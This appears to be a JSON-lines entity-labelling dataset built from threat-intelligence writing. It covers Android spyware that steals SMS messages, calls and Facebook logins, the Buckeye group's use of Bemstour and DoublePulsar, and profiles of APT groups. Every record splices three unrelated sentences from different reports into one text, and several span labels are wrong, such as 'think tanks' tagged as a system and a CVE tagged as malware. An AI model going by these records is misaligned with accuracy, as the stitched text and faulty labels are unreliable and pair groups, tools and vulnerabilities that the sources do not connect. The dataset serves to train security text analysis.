Clusters of Winnti related activity have become a complex topic in threat intelligence circles , with activity vaguely attributed to different codenamed threat actors .", "spans": [{"start": 104, "end": 113, "label": "Organization"}, {"start": 159, "end": 165, "label": "Malware"}]} {"text": "Hide Icon Figure 3 : Code showing the hiding icon and starting service . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . The threat actors utilizing this toolset have repeatedly demonstrated their expertise in compromising Windows based environments .", "spans": [{"start": 77, "end": 84, "label": "Organization"}, {"start": 108, "end": 128, "label": "System"}, {"start": 332, "end": 339, "label": "System"}]} {"text": "As MainService is the main controller , the developer has taken the appropriate actions to keep it functional and running at all times . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . An expansion into Linux tooling indicates iteration outside of their traditional comfort zone .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 276, "end": 281, "label": "System"}]} {"text": "The malware developer uses various tactics to do so , and one of them is using Android 's broadcast receivers . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . 
This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises , as is with Penquin Turla and APT28 \u2019s Linux XAgent variant .", "spans": [{"start": 79, "end": 86, "label": "System"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 173, "end": 193, "label": "System"}, {"start": 274, "end": 276, "label": "System"}, {"start": 431, "end": 444, "label": "Malware"}, {"start": 449, "end": 454, "label": "Organization"}, {"start": 458, "end": 463, "label": "System"}, {"start": 464, "end": 470, "label": "System"}]} {"text": "Broadcast receivers are components that allow you to register for various Android events . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years . Utilizing a passive listener as a communications channel is characteristic of the Winnti developers \u2019 foresight in needing a failsafe secondary command-and-control mechanisms .", "spans": [{"start": 74, "end": 81, "label": "System"}, {"start": 134, "end": 150, "label": "Organization"}, {"start": 340, "end": 346, "label": "Malware"}]} {"text": "In this case , it registers three broadcast receivers : MyReceiver - Triggers when the device is booted . However , Symantec has now found evidence that the Buckeye cyber espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak . 
BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group .", "spans": [{"start": 116, "end": 124, "label": "Organization"}, {"start": 157, "end": 164, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 199, "end": 211, "label": "Organization"}, {"start": 226, "end": 246, "label": "System"}, {"start": 309, "end": 319, "label": "Organization"}, {"start": 390, "end": 401, "label": "Organization"}]} {"text": "Intercept Call - Triggers on incoming and outgoing calls . Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed . The group has shown interest in prominent figures in the United Nations , as well as opposition bloggers , activists , regional news correspondents , and think tanks .", "spans": [{"start": 59, "end": 67, "label": "Organization"}, {"start": 155, "end": 160, "label": "System"}, {"start": 424, "end": 435, "label": "System"}]} {"text": "AlarmReceiver - Triggers every three minutes . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . A group known by Microsoft as NEODYMIUM is Oreportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": [{"start": 47, "end": 59, "label": "Organization"}, {"start": 100, "end": 112, "label": "System"}, {"start": 205, "end": 214, "label": "Organization"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 267, "end": 277, "label": "Organization"}]} {"text": "MyReceiver and AlarmReceiver start the MainService whenever appropriate events occur . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . 
BRONZE BUTLER : REDBALDKNIGHT , Tick .", "spans": [{"start": 118, "end": 140, "label": "Vulnerability"}, {"start": 171, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 198, "end": 211, "label": "Organization"}, {"start": 214, "end": 218, "label": "Organization"}]} {"text": "This tactic is very common among malware developers to ensure the malware is not killed by the Android OS or by any other means . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008 .", "spans": [{"start": 95, "end": 102, "label": "System"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 160, "end": 175, "label": "Vulnerability"}, {"start": 249, "end": 262, "label": "Organization"}]} {"text": "Figure 4 shows MyReceiver in action where it eventually calls the MainService service . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak . The group primarily targets Japanese organizations , particularly those in government , biotechnology , electronics manufacturing , and industrial chemistry .", "spans": [{"start": 107, "end": 120, "label": "Vulnerability"}, {"start": 299, "end": 313, "label": "Organization"}, {"start": 396, "end": 406, "label": "Organization"}]} {"text": "Broadcast Receiver Figure 4 : MyReceiver broadcast receiver . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . 
Carbanak : Anunak , Carbon Spider .", "spans": [{"start": 81, "end": 89, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 169, "end": 175, "label": "Organization"}, {"start": 178, "end": 191, "label": "Organization"}]} {"text": "The InterceptCall receiver is triggered whenever there is an incoming or outgoing call . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown . Carbanak is a threat group that mainly targets banks .", "spans": [{"start": 93, "end": 100, "label": "Organization"}, {"start": 110, "end": 130, "label": "System"}, {"start": 198, "end": 206, "label": "Organization"}]} {"text": "It sets particular parameters in relation to call details and a further service named calls takes the control as seen in Figure 5 . The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S . It also refers to malware of the same name ( Carbanak ) .", "spans": [{"start": 136, "end": 143, "label": "Organization"}, {"start": 343, "end": 351, "label": "Malware"}]} {"text": "Call Service Figure 5 : Code for the calls service As seen above , the calls service stores incoming call details in .mp3 format in the /sdcard/DCIM/.dat/ directory with file name appended with \" In_ '' for incoming calls and \" Out_ '' for outgoing calls . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . 
It is sometimes referred to as FIN7 , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": [{"start": 271, "end": 284, "label": "Vulnerability"}, {"start": 327, "end": 340, "label": "Vulnerability"}, {"start": 382, "end": 386, "label": "Organization"}, {"start": 438, "end": 446, "label": "Malware"}]} {"text": "How these recorded calls are sent to the command and control server ( CnC ) is taken care of by MainService , which is discussed next . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government .", "spans": [{"start": 190, "end": 204, "label": "Organization"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 410, "end": 430, "label": "Organization"}]} {"text": "MainService is the central controller of this spyware . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . 
GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency sevises .", "spans": [{"start": 203, "end": 215, "label": "System"}, {"start": 216, "end": 224, "label": "System"}, {"start": 231, "end": 240, "label": "System"}, {"start": 241, "end": 250, "label": "System"}, {"start": 261, "end": 272, "label": "System"}, {"start": 275, "end": 289, "label": "System"}, {"start": 296, "end": 310, "label": "System"}, {"start": 311, "end": 318, "label": "System"}, {"start": 319, "end": 324, "label": "System"}, {"start": 327, "end": 332, "label": "Organization"}]} {"text": "It controls each and every functionality based on the commands sent by the command and control ( C & C ) server . However , Buckeye had already been using some of these leaked tools at least a year beforehand . Gorgon Group is a threat group consisting of members who are suspected to be Pakistan based or have other connections to Pakistan .", "spans": [{"start": 124, "end": 131, "label": "Organization"}, {"start": 169, "end": 181, "label": "System"}, {"start": 211, "end": 223, "label": "Organization"}]} {"text": "As soon as this service is started , it creates two processes that take care of connection and disconnection to the C & C server . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . The group has performed a mix of criminal and targeted attacks , including campaigns against government organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 157, "end": 177, "label": "System"}, {"start": 181, "end": 188, "label": "Organization"}]} {"text": "This functionality can be seen in Figure 6 . Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 . 
Sandworm Team : Quedagh , VOODOO BEAR .", "spans": [{"start": 71, "end": 78, "label": "Organization"}, {"start": 192, "end": 206, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 233, "end": 240, "label": "Organization"}, {"start": 243, "end": 254, "label": "Organization"}]} {"text": "TimerTask Figure 6 : The timer task . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . Sandworm Team is a Russian cyber espionage group that has operated since approximately 2009 .", "spans": [{"start": 79, "end": 86, "label": "Organization"}, {"start": 118, "end": 139, "label": "System"}, {"start": 148, "end": 160, "label": "System"}, {"start": 276, "end": 289, "label": "Organization"}]} {"text": "MainService has the following capabilities : Steal SMS messages Send SMS messages Steal the victim 's location Capture photos Execute commands Capture screenshots Call phone numbers Initiate other apps Steal Facebook credentials , etc All of the above functionalities take place on the basis of commands sent by the attacker . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . The group likely consists of Russian pro-hacktivists .", "spans": [{"start": 208, "end": 216, "label": "System"}, {"start": 409, "end": 424, "label": "System"}]} {"text": "Stolen data is stored in external storage under the /DCIM/ directory with a hidden sub-directory named \" .dat '' . One hour later , Bemstour was used against an educational institution in Belgium . 
Sandworm Team targets mainly Ukrainian entities associated with energy , industrial control systems , SCADA , government , and media .", "spans": [{"start": 132, "end": 140, "label": "Malware"}, {"start": 188, "end": 195, "label": "Malware"}, {"start": 198, "end": 211, "label": "Organization"}]} {"text": "Below is the list of all the commands catered by the C & C server . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . Sandworm Team has been linked to the Ukrainian energy sector attack in late 2015 .", "spans": [{"start": 68, "end": 76, "label": "Malware"}, {"start": 105, "end": 112, "label": "Malware"}, {"start": 130, "end": 151, "label": "System"}, {"start": 154, "end": 167, "label": "Organization"}]} {"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch DoublePulsar is then used to inject a secondary payload , which runs in memory only . 
Scarlet Mimic is a threat group that has targeted minority rights activists .", "spans": [{"start": 445, "end": 457, "label": "Malware"}, {"start": 474, "end": 480, "label": "Malware"}, {"start": 531, "end": 544, "label": "Organization"}]} {"text": "the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . This group has not been directly linked to a government source , but the group 's motivations appear to overlap with those of the Chinese government .", "spans": [{"start": 9, "end": 17, "label": "System"}, {"start": 70, "end": 78, "label": "System"}, {"start": 151, "end": 159, "label": "System"}, {"start": 189, "end": 197, "label": "System"}, {"start": 527, "end": 535, "label": "Malware"}, {"start": 794, "end": 812, "label": "Organization"}]} {"text": "Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . 
While there is some overlap between IP addresses used by Scarlet Mimic E-APT and Putter Panda , it has not been concluded that the groups are the same .", "spans": [{"start": 442, "end": 450, "label": "System"}, {"start": 476, "end": 497, "label": "System"}, {"start": 554, "end": 564, "label": "Organization"}, {"start": 565, "end": 593, "label": "Organization"}]} {"text": "the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Silence is a financially motivated threat actor targeting financial institutions in different countries .", "spans": [{"start": 217, "end": 225, "label": "Malware"}, {"start": 307, "end": 314, "label": "Organization"}]} {"text": "Facebook phishing One of the interesting features of this spyware is the ability to steal Facebook credentials using a fake login page , similar to phishing . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The group was first seen in June 2016 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 90, "end": 98, "label": "System"}, {"start": 193, "end": 201, "label": "Malware"}]} {"text": "Upon receiving the command GUIFXB , the spyware launches a fake Facebook login page . Development of Bemstour has continued into 2019 . Their main targets reside in Russia , Ukraine , Belarus , Azerbaijan , Poland and Kazakhstan .", "spans": [{"start": 64, "end": 72, "label": "System"}, {"start": 101, "end": 109, "label": "Malware"}]} {"text": "As soon as the victim tries to log in , it stores the victim 's credentials in /storage/0/DCIM/.fdat Facebook Login Figure 7 : Fake Facebook login The second command is IODBSSUEEZ , which further sends stolen credentials to the C & C server , as seen in Figure 8 . 
Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . They compromised various banking systems , including the Russian Central Bank 's Automated Workstation Client , ATMs , and card processing .", "spans": [{"start": 101, "end": 109, "label": "System"}, {"start": 132, "end": 140, "label": "System"}, {"start": 293, "end": 301, "label": "Malware"}, {"start": 332, "end": 337, "label": "Malware"}, {"start": 338, "end": 346, "label": "Malware"}, {"start": 406, "end": 415, "label": "System"}, {"start": 416, "end": 424, "label": "System"}]} {"text": "Stolen Data Figure 8 : Sending data to the attacker . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Threat Group-1314 : TG-1314 .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 229, "end": 246, "label": "Organization"}, {"start": 249, "end": 256, "label": "Organization"}]} {"text": "This functionality can be easily further extended to steal other information , such as bank credentials , although we did not see any banks being targeted in this attack . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . Threat Group-1314 is an unattributed threat group that has used", "spans": [{"start": 172, "end": 181, "label": "Malware"}, {"start": 266, "end": 283, "label": "Organization"}]} {"text": "Calling functionality Command PHOCAs7 initiates calling functionality . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . 
compromised credentials to log into a victim \u2019s remote access infrastructure .", "spans": [{"start": 121, "end": 129, "label": "Organization"}, {"start": 130, "end": 145, "label": "Vulnerability"}]} {"text": "The number to call is received along with the command , as seen in Figure 9 . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . Threat Group-3390 : TG-3390 ,Emissary Panda , BRONZE UNION , APT27 , Iron Tiger , LuckyMouse .", "spans": [{"start": 84, "end": 92, "label": "Organization"}, {"start": 123, "end": 132, "label": "Malware"}, {"start": 284, "end": 299, "label": "Malware"}, {"start": 300, "end": 316, "label": "System"}, {"start": 319, "end": 336, "label": "Organization"}, {"start": 339, "end": 346, "label": "Organization"}, {"start": 347, "end": 362, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 388, "end": 398, "label": "Organization"}, {"start": 401, "end": 411, "label": "Organization"}]} {"text": "Call Command Figure 9 : The calling functionality . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . Threat Group-3390 is a Chinese threat group that extensively used strategic Web compromises to target victims .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 101, "end": 121, "label": "Malware"}, {"start": 126, "end": 145, "label": "Malware"}, {"start": 211, "end": 228, "label": "Organization"}]} {"text": "The phone number is fetched from a response from the C & C server and is stored in str3 variable , which further is utilized using the tel : function . 
Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . The group has been active since at least 2010 and has targeted organizations in the aerospace , government , defense , technology energy , and manufacturing sectors .", "spans": [{"start": 177, "end": 191, "label": "Malware"}, {"start": 205, "end": 219, "label": "Malware"}, {"start": 238, "end": 251, "label": "Malware"}, {"start": 434, "end": 443, "label": "Organization"}, {"start": 446, "end": 456, "label": "Organization"}, {"start": 459, "end": 466, "label": "Organization"}, {"start": 469, "end": 479, "label": "Organization"}, {"start": 480, "end": 486, "label": "Organization"}, {"start": 493, "end": 514, "label": "Organization"}]} {"text": "Stealing SMS The Gxextsxms command is responsible for fetching all the SMS messages from the victim 's device and sending it over to the C & C server . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . Thrip is an espionage group that has targeted satellite communications ,telecoms ,and defense contractor companies in the U.S. and Southeast Asia .", "spans": [{"start": 171, "end": 191, "label": "System"}, {"start": 269, "end": 274, "label": "Organization"}]} {"text": "Stealing SMS Figure 10 : Stealing SMS messages . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . The group uses custom malware as well as \u201c living off the land \u201d techniques .", "spans": [{"start": 75, "end": 84, "label": "Organization"}, {"start": 100, "end": 119, "label": "System"}]} {"text": "Similarly , there are many crucial commands that further allow this spyware to perform additional functionality , such as executing commands sent by the C & C , clicking photos , capturing screenshots , stealing location information , and more . 
FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": [{"start": 246, "end": 255, "label": "System"}, {"start": 356, "end": 370, "label": "Organization"}, {"start": 381, "end": 390, "label": "Organization"}]} {"text": "Further analysis Upon further research , we found this spyware to be developed by a framework similar to Spynote and Spymax , meaning this could be an updated version of these Trojan builders , which allow anyone , even with limited knowledge , to develop full-fledged spyware . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics .", "spans": [{"start": 105, "end": 112, "label": "Malware"}, {"start": 117, "end": 123, "label": "Malware"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 339, "end": 353, "label": "Organization"}, {"start": 464, "end": 474, "label": "Organization"}]} {"text": "Many of the functionalities seen in this spyware are similar to Spynote and Spymax based on the samples we analyzed with some modifications . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . 
NEODYMIUM is reportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": [{"start": 64, "end": 71, "label": "Malware"}, {"start": 76, "end": 82, "label": "Malware"}, {"start": 196, "end": 204, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 315, "end": 325, "label": "Organization"}]} {"text": "This spyware sample communicates over dynamic DNS . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Night Dragon is a campaign name for activity involving a threat group that has conducted activity originating primarily in China .", "spans": [{"start": 57, "end": 60, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 109, "label": "Malware"}, {"start": 112, "end": 124, "label": "Organization"}]} {"text": "By doing so , attackers can easily set up the Trojan to communicate back to them without any need for high-end servers . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . OilRig : IRN2 , HELIX KITTEN , APT34 .", "spans": [{"start": 129, "end": 136, "label": "Malware"}, {"start": 149, "end": 160, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 220, "end": 224, "label": "Organization"}, {"start": 227, "end": 239, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}]} {"text": "Other common functionalities include executing commands received from the attacker , taking screenshots of the victim 's device , fetching locations , stealing SMS messages and most common features that every spyware may poses . This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics . 
OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014 .", "spans": [{"start": 328, "end": 339, "label": "Organization"}, {"start": 373, "end": 397, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}]} {"text": "Stealing Facebook credentials using fake Facebook activity is something we did n't observe in Spynote/Spymax versions but was seen in this spyware . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . The group has targeted a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": [{"start": 9, "end": 17, "label": "Organization"}, {"start": 41, "end": 49, "label": "Organization"}, {"start": 94, "end": 108, "label": "Malware"}, {"start": 177, "end": 186, "label": "Malware"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 354, "end": 364, "label": "Organization"}, {"start": 367, "end": 373, "label": "Organization"}, {"start": 376, "end": 384, "label": "Organization"}, {"start": 391, "end": 409, "label": "Organization"}]} {"text": "This framework allows anyone to develop a malicious app with the desired icon and communication address . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . It appears the group carries out supply chain attacks , leveraging the trust relationship between organizations to attack their primary targets .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 210, "end": 227, "label": "System"}, {"start": 232, "end": 237, "label": "System"}]} {"text": "Some of the icons used can be seen below . 
According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": [{"start": 126, "end": 138, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 243, "end": 261, "label": "Organization"}]} {"text": "We found 280 such apps in the past three months . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . This group was previously tracked under two distinct groups , APT34 and OilRig , but was combined due to additional reporting giving higher confidence about the overlap of the activity .", "spans": [{"start": 104, "end": 113, "label": "Malware"}, {"start": 316, "end": 321, "label": "Organization"}, {"start": 326, "end": 332, "label": "Organization"}]} {"text": "A complete list of hashes can be found here . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . APT16 is a China based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations .", "spans": [{"start": 46, "end": 58, "label": "Malware"}, {"start": 115, "end": 125, "label": "Malware"}, {"start": 128, "end": 133, "label": "Organization"}]} {"text": "icons Figure 11 : Icons used to pose as famous apps . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . 
APT17 : Deputy Dog .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 215, "end": 222, "label": "Organization"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}]} {"text": "All of these apps are developed by the same framework and hence have the same package name and certificate information as seen in Figure 12. certificate Figure 12 : Package name and certificate information . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . APT17 is a China based threat group that has conducted network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": [{"start": 226, "end": 232, "label": "Organization"}, {"start": 288, "end": 291, "label": "System"}, {"start": 292, "end": 301, "label": "System"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 436, "end": 445, "label": "Organization"}, {"start": 448, "end": 480, "label": "Organization"}, {"start": 483, "end": 499, "label": "Organization"}]} {"text": "Conclusion Due to the ubiquitous nature of mobile devices and the widespread use of Android , it is very easy for attackers to victimize Android users . Today , this malware is still actively being used against the Philippines . APT18 : TG-0416 , Dynamite Panda , Threat Group-0416 .", "spans": [{"start": 84, "end": 91, "label": "System"}, {"start": 137, "end": 144, "label": "System"}, {"start": 166, "end": 173, "label": "Malware"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 237, "end": 244, "label": "Organization"}, {"start": 247, "end": 261, "label": "Organization"}, {"start": 264, "end": 281, "label": "Organization"}]} {"text": "In such situations , mobile users should always take the utmost precautions while downloading any applications from the internet . 
Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries , including , manufacturing , human rights , government , and .", "spans": [{"start": 164, "end": 167, "label": "Organization"}, {"start": 227, "end": 232, "label": "Organization"}]} {"text": "It is very easy to trick victims to fall for such attacks . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . Group5 is a threat group with a suspected Iranian nexus , though this attribution is not definite .", "spans": [{"start": 93, "end": 97, "label": "Organization"}, {"start": 173, "end": 184, "label": "System"}, {"start": 189, "end": 204, "label": "System"}, {"start": 207, "end": 213, "label": "Organization"}]} {"text": "Users looking forward to using the TikTok app amidst the ban might look for alternative methods to download the app . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes , normally using Syrian and Iranian themes .", "spans": [{"start": 35, "end": 41, "label": "System"}, {"start": 118, "end": 124, "label": "Malware"}, {"start": 150, "end": 160, "label": "Malware"}, {"start": 200, "end": 204, "label": "Malware"}]} {"text": "In doing so , users can mistakenly install malicious apps , such as the spyware mentioned in this blog . Xagent \u2013 A variant of JbossMiner Mining Worm\u201d \u2013 a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . 
Group5 has used two commonly available remote access tools ( RATs ) , njRAT S-MAL and NanoCore , as well as an Android RAT , DroidJack .", "spans": [{"start": 105, "end": 111, "label": "Organization"}, {"start": 127, "end": 144, "label": "Organization"}, {"start": 248, "end": 254, "label": "Organization"}, {"start": 287, "end": 306, "label": "Malware"}, {"start": 309, "end": 313, "label": "Malware"}, {"start": 316, "end": 342, "label": "Malware"}, {"start": 359, "end": 370, "label": "Malware"}, {"start": 373, "end": 382, "label": "Malware"}]} {"text": "The precautions you take online have been covered extensively in almost all of our blogs ; even so , we believe this information bears repeating . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang \u2013 a cyberespionage campaign directed at diplomatic organizations in Europe . Honeybee is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": [{"start": 190, "end": 199, "label": "Organization"}, {"start": 225, "end": 233, "label": "Organization"}]} {"text": "Please follow these basic precautions during the current crisis\u2014and at all times : Install apps only from official stores , such as Google Play . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group \u2013 a backdoor we named Okrum . It has been an active operation since August of 2017 and as recently as February 2018 .", "spans": [{"start": 132, "end": 143, "label": "System"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 322, "end": 330, "label": "System"}, {"start": 340, "end": 345, "label": "System"}]} {"text": "Never click on unknown links received through ads , SMS messages , emails , or the like . 
Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group \u2013 BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . Group7 : APT15 , Mirage , Vixen Panda , GREF , Playful Dragon , RoyalAPT .", "spans": [{"start": 193, "end": 201, "label": "Organization"}, {"start": 210, "end": 226, "label": "System"}, {"start": 259, "end": 275, "label": "System"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 310, "end": 316, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 327, "end": 333, "label": "Organization"}, {"start": 336, "end": 347, "label": "Organization"}, {"start": 350, "end": 354, "label": "Organization"}, {"start": 357, "end": 371, "label": "Organization"}, {"start": 374, "end": 382, "label": "Organization"}]} {"text": "Always keep the \" Unknown Sources '' option disabled in the Android device . Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected . Ke3chang is a threat group attributed to actors operating out of China .", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 77, "end": 85, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]} {"text": "This disallows apps to be installed on your device from unknown sources . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . 
